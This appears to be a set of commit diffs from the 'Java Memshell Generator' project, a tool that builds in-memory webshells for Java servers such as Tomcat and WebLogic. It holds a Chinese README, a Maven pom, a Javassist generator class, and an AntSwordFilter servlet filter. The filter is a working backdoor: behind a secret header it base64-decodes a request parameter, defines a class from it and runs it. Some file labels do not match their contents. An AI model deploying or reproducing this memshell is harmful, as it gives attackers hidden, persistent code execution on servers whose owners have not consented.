61快乐

Author: pen4uin

README.md

@@ -1,39 +1,65 @@
-# Java Memshell Generator
+<h4 align="right"><strong><a href="jmg-docs/README_EN.md">English</a></strong> | 中文 </h4>
+<p align="center">
+  <h1 align="center">Java Memshell Generator</h1>
+  <div align="center">
+    <img alt="GitHub watchers" src="https://img.shields.io/github/watchers/pen4uin/java-memshell-generator?style=flat-square">
+    <img alt="GitHub forks" src="https://img.shields.io/github/forks/pen4uin/java-memshell-generator?style=flat-square">
+    <img alt="GitLab Stars" src="https://img.shields.io/github/stars/pen4uin/java-memshell-generator.svg?style=flat-square">
+  </div>
+  <div align="center">一款支持高度自定义的 Java 内存马生成工具</div>
+</p>
 
-## 0x01 Introduce
+<img src="./jmg-docs/img/gui.png" width="900px" />
 
-**jMG (Java Memshell Generator)** 是一款支持高度自定义的 Java 内存马生成工具，提供常见中间件的内存马注入支持。
+<br>
 
-主要功能如下：
-- 支持的中间件和框架 (Tomcat/Resin/Jetty/WebLogic/WebSphere/Undertow/GlassFish/SpringMVC/SpringWebFlux)
-- 支持的工具 (AntSword/Behinder/Godzilla/Suo5)
-- 支持的内存马类型 (Filter/Listener/Interceptor/HandlerMethod)
-- 支持的输出格式 (BASE64/BCEL/CLASS/JS/JSP/JAR/BIGINTEGER)
-- 支持的辅助模块 (专项漏洞封装/表达式语句封装)
+> [!WARNING]
+> 本工具仅供安全研究和学习使用。使用者需自行承担因使用此工具产生的所有法律及相关责任。请确保你的行为符合当地的法律和规定。作者不承担任何责任。如不接受，请勿使用此工具。
 
-> 此工具仅限于安全研究和教学，用户承担因使用此工具而导致的所有法律和相关责任！ 作者不承担任何法律和相关责任！
+<br>
 
+## 功能
 
-## 0x02 Usage
+| 中间件       | 框架            | 工具 (测试版本)                                                        | 内存马类型         | 输出格式       | 辅助模块    |
+|-----------|---------------|------------------------------------------------------------------|---------------|------------|---------|
+| Tomcat    | SpringMVC     | [AntSword](https://github.com/AntSwordProject/antSword) (2.1.15) | Listener      | BASE64     | 专项漏洞封装  |
+| Resin     | SpringWebFlux | [Behinder](https://github.com/rebeyond/Behinder) (4.0.7)         | Filter        | BCEL       | 表达式语句封装 |
+| WebLogic  |               | [Godzilla](https://github.com/BeichenDream/Godzilla) (4.0.1)     | Interceptor   | BIGINTEGER |         |
+| Jetty     |               | [Neo-reGeorg](https://github.com/L-codes/Neo-reGeorg) (5.1.0)    | HandlerMethod | CLASS      |         |
+| WebSphere |               | [Suo5](https://github.com/zema1/suo5) (0.9.0)                    |               | JAR        |         |
+| Undertow  |               | Custom                                                           |               | JAR_AGENT  |         |
+| GlassFish |               |                                                                  |               | JS         |         |
+|           |               |                                                                  |               | JSP        |         |
 
-下载 jMG-GUI.jar 运行即可
+## 编译
 
-![](./img/gui.png)
+- maven
 
+```shell
+mvn package assembly:single
+```
 
-## 0x03 Reference
-
-使用手册
-- [jMG v1.0.4](https://mp.weixin.qq.com/s/oAiGWY9ABhn2o148snA_sg)
-- [jMG v1.0.5](https://mp.weixin.qq.com/s/QjoRs_J5jVANrdEiiTtVtA)
-- [jMG v1.0.6](https://mp.weixin.qq.com/s/0ZzH35aRUPelq8nwilMQiA)
-- [jMG v1.0.8](https://mp.weixin.qq.com/s/HkceemQBtKJeWMBrMvUeXA)
+- jmg-gui
 
-参考项目
-```
-https://github.com/woodpecker-appstore/jexpr-encoder-utils
-https://github.com/feihong-cs/memShell
-https://github.com/su18/MemoryShell
-https://github.com/BeichenDream/GodzillaMemoryShellProject
-https://github.com/whwlsfb/cve-2022-22947-godzilla-memshell
+```shell
+java -jar ./jmg-gui/target/jmg-gui-1.0.8-jar-with-dependencies.jar
 ```
+
+## 文档
+
+- [jMG v1.0.8](https://9ex.org/jmg-1-0-8/)
+- [jMG v1.0.6](https://9ex.org/jmg-1-0-6/)
+- [jMG v1.0.5](https://9ex.org/jmg-1-0-5/)
+- [jMG v1.0.4](https://9ex.org/jmg-1-0-4/)
+
+## 致谢
+
+- https://github.com/c0ny1
+- https://github.com/whwlsfb
+- https://github.com/feihong-cs/memShell
+- https://github.com/su18/MemoryShell
+- https://github.com/BeichenDream/GodzillaMemoryShellProject
+
+## 协议
+
+- 遵循 MIT 协议

img/gui.png

@@ -0,0 +1,21 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+    <parent>
+        <groupId>jmg</groupId>
+        <artifactId>java-memshell-generator</artifactId>
+        <version>${revision}</version>
+    </parent>
+    <artifactId>jmg-antsword</artifactId>
+
+
+    <dependencies>
+        <dependency>
+            <groupId>jmg</groupId>
+            <artifactId>jmg-core</artifactId>
+            <version>${revision}</version>
+            <scope>compile</scope>
+        </dependency>
+    </dependencies>
+
+</project>

img/sglab.svg

@@ -0,0 +1,56 @@
+package jmg.antsword.generator;
+
+import javassist.ClassClassPath;
+import javassist.CtClass;
+import jmg.core.config.AbstractConfig;
+import jmg.core.config.Constants;
+import jmg.core.generator.IShellGenerator;
+import jmg.antsword.util.ShellUtil;
+import jmg.core.util.CommonUtil;
+import jmg.core.util.JavassistUtil;
+import jmg.core.util.ResponseUtil;
+public class AntSwordGenerator implements IShellGenerator {
+
+    @Override
+    public void initShell(AbstractConfig config) {
+        if (config.getPass() == null) config.setPass(CommonUtil.genRandomLengthString(6));
+    }
+
+    @Override
+    public byte[] makeShell(AbstractConfig config) throws Exception {
+        initShell(config);
+        String shellName = ShellUtil.getShellName(config.getToolType(), config.getShellType());
+        String shellClassName = ShellUtil.getShellClassName(shellName);
+        byte[] bytes = modifyShell(shellClassName, config);
+        config.setShellBytes(bytes);
+        config.setShellBytesLength(bytes.length);
+        config.setShellGzipBase64String(CommonUtil.encodeBase64(CommonUtil.gzipCompress(bytes)));
+        return bytes;
+    }
+
+    @Override
+    public byte[] modifyShell(String className, AbstractConfig config) {
+        byte[] bytes = new byte[0];
+        try {
+            pool.insertClassPath(new ClassClassPath(AntSwordGenerator.class));
+            CtClass ctClass = pool.getCtClass(className);
+            ctClass.getClassFile().setVersionToJava5();
+            JavassistUtil.addFieldIfNotNull(ctClass, "pass", config.getPass());
+            JavassistUtil.addFieldIfNotNull(ctClass, "headerName", config.getHeaderName());
+            JavassistUtil.addFieldIfNotNull(ctClass, "headerValue", config.getHeaderValue());
+            JavassistUtil.setNameIfNotNull(ctClass, config.getShellClassName());
+
+            if (config.getShellType().equals(Constants.SHELL_LISTENER)) {
+                String methodBody = ResponseUtil.getMethodBody(config.getServerType());
+                JavassistUtil.addMethod(ctClass, "getResponseFromRequest", methodBody);
+            }
+            JavassistUtil.removeSourceFileAttribute(ctClass);
+            bytes = ctClass.toBytecode();
+            ctClass.detach();
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+        return bytes;
+    }
+
+}

jmg-antsword/pom.xml

@@ -0,0 +1,57 @@
+package jmg.antsword.memshell;
+
+import javax.servlet.*;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+import java.lang.reflect.Method;
+import java.net.URL;
+import java.net.URLClassLoader;
+
+public class AntSwordFilter implements Filter {
+    public String pass;
+    public String headerName;
+    public String headerValue;
+
+    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
+        HttpServletRequest request = (HttpServletRequest) servletRequest;
+        HttpServletResponse response = (HttpServletResponse) servletResponse;
+        try {
+            if (request.getHeader(this.headerName) != null && request.getHeader(this.headerName).contains(this.headerValue)) {
+                String cls = request.getParameter(pass);
+                if (cls != null) {
+                    try {
+                        byte[] data = doBase64Decode(cls);
+                        URLClassLoader classLoader = new URLClassLoader(new URL[0], Thread.currentThread().getContextClassLoader());
+                        Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
+                        method.setAccessible(true);
+                        Class clazz = (Class) method.invoke(classLoader, data, new Integer(0), new Integer(data.length));
+                        clazz.newInstance().equals(new Object[]{request, response});
+                    } catch (Exception var7) {
+                    }
+                }
+            } else {
+                filterChain.doFilter(servletRequest, servletResponse);
+            }
+        } catch (Exception e) {
+            filterChain.doFilter(servletRequest, servletResponse);
+        }
+    }
+
+    public byte[] doBase64Decode(String str) throws Exception {
+        try {
+            Class clazz = Class.forName("sun.misc.BASE64Decoder");
+            return (byte[]) ((byte[]) ((byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str)));
+        } catch (Exception var5) {
+            Class clazz = Class.forName("java.util.Base64");
+            Object decoder = clazz.getMethod("getDecoder").invoke((Object) null);
+            return (byte[]) ((byte[]) ((byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str)));
+        }
+    }
+
+    public void init(FilterConfig filterConfig) throws ServletException {
+    }
+
+    public void destroy() {
+    }
+}